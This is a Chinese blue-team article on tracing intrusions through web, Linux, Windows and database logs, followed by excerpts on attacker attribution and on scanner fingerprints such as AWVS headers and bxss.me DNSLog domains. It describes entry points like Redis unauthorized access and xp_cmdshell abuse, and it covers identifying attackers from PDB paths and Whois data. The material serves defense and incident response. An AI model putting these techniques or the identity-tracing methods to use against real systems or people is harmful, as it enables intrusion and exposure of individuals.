web系统上次自己部署了一个web系统在VPS上面,后面看了一下access日志基本上每天都有好多的web系统扫描事件,路径探测的、EXP扫描的、文件遍历的什么都有筛选起来特别头疼。一般web类的安全事件在web日志当中一般都能发现一些端倪,清除日志这种事情毕竟不是每个黑客都会干。常见几个中间件的日志如下:1.apache的日志路径一般配置在httpd.conf的目录下或者位于/var/log/http2.IIS的日志默认在系统目录下的Logfiles下的目录当中3.tomcat 一般位于tomcat安装目录下的一个logs文件夹下面4.Nginx日志一般配置在nginx.conf或者vhost的conf文件中日志一般以日期命名,方便后续审计与安全人员进行分析。工欲善其事必先利其器,一般日志量都比较大。互联网上还是有很多的日志检测工具,个人不是很喜欢用主要工具还是notepad++ 和Sublime Text跟进收集的信息比如时间点这种情况,对时间点前后的请求日志进行分析,一般都都能发现一些异常。为了方便的识别一些日志,github也有很多开源项目有专门去日志中找安全相关攻击的、或者是统计的。因为现在很多扫描器也比较多,一检查往往也会发现很多无效的攻击,筛选起来反而感觉更麻烦。推荐一个小工具:web-log-parser为开源的分析web日志工具,采用python语言开发,具有灵活的日志格式配置。优秀的项目比较多,萝卜青菜各有所爱自己喜欢较好,实在不行就自己定义好规则搞一个。连接如下:https://github.com/JeffXue/web-log-parser在处理一些访问访问、网页更改的时候、上传路径、源IP之类的信息都能够较好的收集。通过对一些关键路径的识别,结合一定的信息往往都能定位到入口点。常见的一些入口点举例如下:1.一些CMS的EXP,比如Discuz Empire Spring 之类的一些命令执行、权限绕过逻辑漏洞等因为比较通用,网上很多都是公开的所以涉及面相对较广。2.编辑器的上传漏洞,比如知名的FCK编辑器、UEditor之类。3.功能性上传过滤不严格,比如头像上传资料上传界面一些过滤严格导致的上传漏洞。4.Web系统的弱口令问题 admin账户、或者是tomcat的manager用户弱口令 、Axis2弱口令用户、Openfire弱口令等等同时web系统往往容易存在一些webshell的情况,经常在一些上传目录里面找到一些webshell、明明是个JSP的网页还出现了一个php的一句话。一般需要重点关注一下。推荐用D盾对web系统的目录进行扫描。扫描出来的webshell时间上传时间、文件创建时间、文件修改时间往往准确性都比较高,一般不会去更改这个时间,用来在日志当中排查就相对容易的多。0x2 主机系统以前一直觉得一些蠕虫病毒都挺逗的很多传播方法居然只是依靠暴力破解和MS17-010之类的漏洞传播,感觉波及面应该比较小后面才发现这个方法简单粗暴反而最有效。对于Linux平台相对安全性偏高一些,常见的几个病毒如XorDDOS、DDG、XNote系列的普遍也是依靠暴力破解进行传播,溯源的过程中也重点考虑暴力破解。常用的一些日志举例如下:/var/log/auth.log 包含系统授权信息,包括用户登录和使用的权限机制等信息/var/log/lastlog 记录登录的用户,可以使用命令lastlog查看/var/log/secure 记录大多数应用输入的账号与密码,登录成功与否/var/log/cron 记录crontab命令是否被正确的执行grep,sed,sort,awk几个命令灵活运用、关注Accepted、Failed password 、invalid特殊关键字一般也能轻松发现一些端倪如下:经常一些攻击者忘记清除日志,就很方便能查看详细了。一个history命令,黑客的操作就一目了然。当然了一些脚本执行完了之后往往最后会清除日志比如下面这样的往往就加大了难度,日志被清除了往往就更显得异常了。可以重点看一下还剩下那些日志、或者关注一下网络层面是不是还有其他的安全设备可以在流量层进行溯源分析的。源于Linux一切皆文件与开源的特性,在溯源的过程中也有好处也有坏处,rootkit就是最麻烦的一件事情了。由于系统一些常用的命令明文都已经被更改和替换,此系统已经变得完全不可信,在排查溯源的过程中往往不容易发觉对安全服务的人员就有较高的技术要求了。Windows平台下面的溯源就相对容易一些当然主要还是依靠windows的日志一般用 eventvwr命令打开事件查看器。默认分为三类:l应用程序、安全、性统 以evt文件形式存储%systemroot%system32config目录:合理使用筛选器往往可以帮助我们更好的排查日志,比如怀疑是暴力破解入侵的筛选事件ID == 4625审核失败的日志,后续通过对时间的排查、以及源IP地址、类型与请求的频率进行分析来判断是否是来源于内网的暴力破解。通过系统内部的日志来判断是否是恶意进程的运行状态。通过对logontype的数值确认就可以确认到底是通过什么协议进行暴力破解成功的。相对的数值关系如下:local WINDOWS_RDP_INTERACTIVE = "2"local WINDOWS_RDP_UNLOCK = "7"local WINDOWS_RDP_REMOTEINTERACTIVE = "10"local WINDOWS_SMB_NETWORK = "3"如下图就是一个典型的SMB的认证失败情况:Windows系统的补丁相对重要一些,一些关键的补丁没有打很容易遭受到攻击成功的事件。重点就关注一些常见的比如ms17-010 ms08-067 ms16-032等安全补丁都是内网渗透常用的攻击包。可以通过sysintemfo可以查看到当前系统当中已经安装的补丁。此外windows下面还包括很多域控的安全日志,因为内容太多就不再展开叙述,溯源主要还是想还原攻击路径,通过windows日志搞明白访问关系攻击者的攻击链条,给用户一个交代就好。0x3 其他常用系统数据库系统也是攻击者入口点的一些重灾区,常见的比如msssql server由于数据往往在window环境下安装后具有较高的权限,一些用户经常安装完成之后也不会怎么去加固数据库,基于库站分离的原则很多mssql公网直接就可以访问访问控制策略比较弱,弱口令的问题尤为突出。比如下对于mssql的sa用户暴力破解日志,里面也记录着客户端的IP地址如果没有配置相关的锁定策略在密码不够严格的情况下容易被攻陷。攻击者爆破成功之后启动xp_shell往往就可以以高权限执行系统命令,拿到了一个windows的shell岂不是为所欲为。Linux平台下面的redis也很热门,就一个几年的默认安装后的未授权访问的问题却流传的相对广泛。比如最近一段事件相对比较热门的DDG挖矿、WatchDog挖矿等病毒都主要利用redis未授权访问执行命令,从互联网拉取挖矿程序写入ssh的公钥等功能。看见本地开放了6379端口的时候还是需要重点关注这个问题,多向用户咨询一下使用情况查看一下默认配置。还有一些常用的系统比如mysql数据库暴力破解提权一套装、hadoop未授权访问漏洞、钓鱼邮件、破解软件后门、恶意的office宏、office的代码执行漏洞、邮箱缺陷、VPN配置缺陷等情况都可能是攻击者的入口点具体情况需要结合用户当前的情况具体进行排查。0x4 总结都说安全本质到最后就是人与人之间的一个较量,对于很多定向攻击的安全事件排查起来估计就比较有意思,主机端的日志被清除掉流量层面全程隧道通信就呵呵了。站在攻防的角度从攻击者的思维模型去做应急,思考更多的攻击者可能的途径,经常利用的姿势、漏洞与常用的攻击手法再用数据去加以验证,不局限在已知漏洞中而放过其他的问题,如果能够做到积极主动且有预见性,就能更好地控制后果,说不过在过程中还能发现几个0day也算是意外之喜了。作者:si1ence来源:freebuf一如既往的学习,一如既往的整理,一如即往的分享。感谢支持“如侵权请私聊公众号删文”扫描关注LemonSec觉得不错点个“赞”、“在看”哦 本文始发于微信公众号(LemonSec):浅谈入侵溯源过程中的一些常见姿势
阅读全文
溯源 安全百科

溯源

溯源,在网络安全领域,一般理解为针对攻击事件,追寻攻击源头的行为,溯源的目的一般为查找事实真相。在真实的网络攻击中,企业对攻击者往往只能溯源到其IP地址,或捕获到其DNS、C2地址,受资源和能力限制,多数需要依靠公安部门、网络运营商或受害用户等多种角色的参与才能真正达到溯源的目的。 信息源于:freebuf-wiki相关推荐: 破解破解,在网络安全领域一般指破解软件的行为,是指研究软件的激活机制后,通过修改内存或者程序文件、或者写注册机程序,来达到免费使用该软件、或者突破其功能限制的目的的过程。常用到的工具如OD(OllyDBG)、WinHex等。 信息源于:freebuf-wiki相关…
阅读全文
蓝队的自我修养之事后溯源 安全文章

蓝队的自我修养之事后溯源

背景 众所周知,攻防演练过程中,攻击者千方百计使用各种方法渗透目标。一般情况下攻击链包括:侦察、武器化、交付、利用、安装、命令和控制、窃取目标数据。在溯源中,安全人员对攻击者某个阶段的攻击特点进行分析,再结合已掌握的威胁情报数据将攻击特点和数据聚类,能够有效掌握攻击者的攻击手法和 IP &域名资产等。前文(蓝队的自我修养之事中监控)中讲到了在攻防演练场景下如何从海量的告警日志中获取高度疑似攻击者的 IP,在发现有攻击者之后,快速对其进行精准地溯源反制,收集攻击路径和攻击者身份信息,描绘出完整的攻击者画像。本文中笔者将对溯源的难点、目标以及方法论展开讨论。 难点 当前,攻击者溯源主要存在以下几个难点: 安全分析人员经验缺乏,水平参差不齐; 安全分析人员易疏忽有利于溯源的关键点; 没有具体的关联点,无法自动化或者半自动的溯源。 目标 通过攻防演练的实践,我们总结出一套能够有效溯源(归因)攻击者的方法。通过此方法我们可以将攻击者信息有效聚类达到深度溯源的目的,预期的目标包括: 掌握攻击者的攻击手法(例如:特定木马、武器投递方法); 掌握攻击者背后的 IP&域名资产(例如:木马 C2、木马存放站点、资产特点); 掌握攻击者的真实-身份; 掌握攻击者武器的检测或发现方法,将捕获的数据形成新的线索。 方法论 我们针对交付、利用、安装、命令和控制四个阶段捕获到的数据做深度分析,聚类提取数据特点形成规则。将规则应用于一些安全设备产出高可信度的告警用于防御,或者结合情报数据(如样本信息、域名信息、IP 信息等),将深度溯源的情报(如身份信息、攻击队伍等)产出。 1. 攻击链部分可溯源关键点 下图列举攻击链中部分可溯源的关键点: 2. 攻击链利用阶段可溯源方法及关键点 下图是在攻击链的利用阶段可溯源的方法&关键点: 攻击回溯的关键点主要分为两类: 攻击分类:根据攻击者的漏洞利用数据包特点(如:字符串格式、特殊字符串)。 攻击者信息:攻击者使用其公司(个人)特有的漏洞利用工具时,可能会在请求包中存在公司(个人)信息。 3. 钓鱼邮件可溯源方法及关键点 下图是钓鱼邮件中可溯源的方法&关键点: 发件 IP、发件账号、邮件内容(格式特点等)可用于将攻击者投递的邮件分类; 发件账号中可能存在个人信息,如:“账号@qq.com”、“昵称@gmail.com” 等此类字符串,检索该字符串可用于挖掘身份信息; 邮件内容大致可分以下三类: - 投递物(后门木马、其他攻击组件) - 钓鱼网站,包含域名、IP 等信息 - 其他,需要研究邮件中的字符串,邮件可能存在攻击者的其他账号(在真实场景中出现过) 发件 IP、发件服务器,属攻击者资产。 4. 后门木马可溯源方法及关键点 下图是后门木马(需要对二进制后门、脚本后门进行分析)可溯源的方法&关键点 : 代码逻辑,由于人的惰性,红队开发者可能会复用以前的一些代码。如代码特点比较明显,可用于分类和拓线。 字符串特点,用于将红队投递的样本分类和拓线更多的样本,将检索到的样本再进行分析,分析历史样本(如测试阶段的样本)看是否会暴露出更多信息。 元数据(投递的诱饵不同,得到的元数据不同。诱饵类型包括:LNK、EXE、DOCX等)。 - EXE 文件:存在 PDB 信息,部分开发人员将项目存放在桌面,这会导致编译信息带入开发人员的终端名称(极大可能为个人昵称)。 - LNK 文件:由于 LNK 文件在新建的时候会带入计算机名称,这可以用于样本的拓线和分类,极少情况下可找到个人昵称。 - DOCX 文件:可能存在“最后编辑者名称”。 回连 C2,属攻击者资产。 5. 攻击者资产维度可溯源方法及关键点 攻击者资产维度可溯源的方法及关键点,主要如下图: 域名自身特点,如:昵称字符串 搭建网站(通过图中四种方法探测资产的现有数据和历史数据) a. 网站可能存在红队的其他攻击组件 b. 网站存在个人昵称、简介等 c. 网站备案信息 Whois 信息,可能包含:注册者邮箱、电话号码等 IP 信息需要考虑如下两点: a. 是否定位到某个安全公司的地理位置 b. 是否标记为某个安全公司的网关 6. 命令和控制阶段可产出的数据 下图中是在命令和控制阶段可产出的数据点,结合上述的方法进一步溯源。 用于防御,将掌握的流量规则部署在安全设备中 积累数据,掌握更多的木马、资产,支撑上述中的各种溯源方法 7. 身份信息溯源方向 下图中列举身份信息的溯源方向: 虚拟身份 攻击者资产暴露的信息,如:Whois 信息、个人网站简介、GitHub 个人简介 样本暴露的信息,如:PDB 信息、个人昵称、存放特马的 Github 账号 蜜罐捕获,如:百度 ID、新浪 ID 等...
阅读全文
蓝队的自我修养之事中监控 安全文章

蓝队的自我修养之事中监控

背景 一年一度的重保活动在即,作为防守方将进行 7*24h 的值守安全设备,防守方主要从“事前排查”、“事中监控”、“事后溯源”三个维度开展自己的工作。 “事前排查”主要是针对组织资产信息进行深度了解,掌握隐形资产,发现明显风险点并修复; “事中监控”也就是监控安全设备的告警,从海量日志中筛选出漏报、误报以及发现真实的攻击者; “事后溯源”是基于“事中监控”的更进一步,只有从安全设备上发现更多的真实攻击者,才能提升溯源的成功率。 由于“事前排查”并非人人都需参与,故此次经验分享仅从“事中监控”和“事后溯源”两个维度展开描述,本篇讲的是“事中监控”这一部分。 精准定位 1. 扫描器 企业安全犹如木桶定律,最短的木板是评估木桶品质的标准,安全最薄弱环节也是决定企业安全好坏的关键。在重保活动中攻击者的目标很明确,找数据进内网,那么如何快速准确的从企业海量的资产中找到企业的漏洞入口点,常用的方法就是扫描器,故掌握开源或者商业的扫描器的指纹特征,可以快速的定位真实的攻击IP,做到准确封禁。指纹特征的提取一般就是基于http请求包或者响应包,下面抛砖引玉简单列举下常见的扫描器的指纹特征。 Crawlergo 0Kee-Team 开源了 360 天相的爬虫模块Crawlergo(https://github.com/0Kee-Team/crawlergo),白帽子通常会把 Crawlergo 集成到自己开发的扫描器中去挖掘漏洞,使用 Crawlergo 扫描网站,HTTP 头带有自定义字段 Spider-Name: crawlergo,故搜索该规则可以获取到 360 扫描器或者白帽子基于 Crawlergo 二次开放的扫描器地址。下图为通过规则检索到 Crawlergo 爬虫攻击的日志。 AWVS 扫描器 Acunetix Web Vulnerability Scanner(简称 AWVS)是一款知名的网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行安全漏洞。互联网侧存在很多白帽子部署的 AWVS 扫描器,通过 Fofa 检索 title=="Acunetix" 可以看到有 659 个 IP 部署了 AWVS,如果企业未在互联侧部署有 AWVS,则可以将以上 IP 作为重点监控对象。 白帽子使用 AWVS 扫描器对企业资产进行扫描时,HTTP 请求包和响应包中都存在有特征。 (1) Accept:acunetix/wvs (2) HTTP 请求头存在 Acunetix-* 的自定义字段 (3) HTTP 请求包或者响应包中包含 hit*.bxss.me AWVS 在进行无回显漏洞探测时候会使用到 DNSLog(bxss.me),DNSLog 生成规则为 "http://hit" + rndToken + '.bxss.me/' 随机的三级域名作为 payload。 2. DNSLog DNSLog 是一种监控 DNS 解析记录和 HTTP 访问记录的工具,将 DNSLog 平台中的特有字段 payload 带入目标发起 DNS 请求,通过 DNS 解析将请求后的关键信息组合成新的三/四级域名带出,在 NS 服务器的 DNS 日志中显示出来。通常攻击者使用 DNSLog 测试诸如 sqli、rce、ssrf、rfi...
阅读全文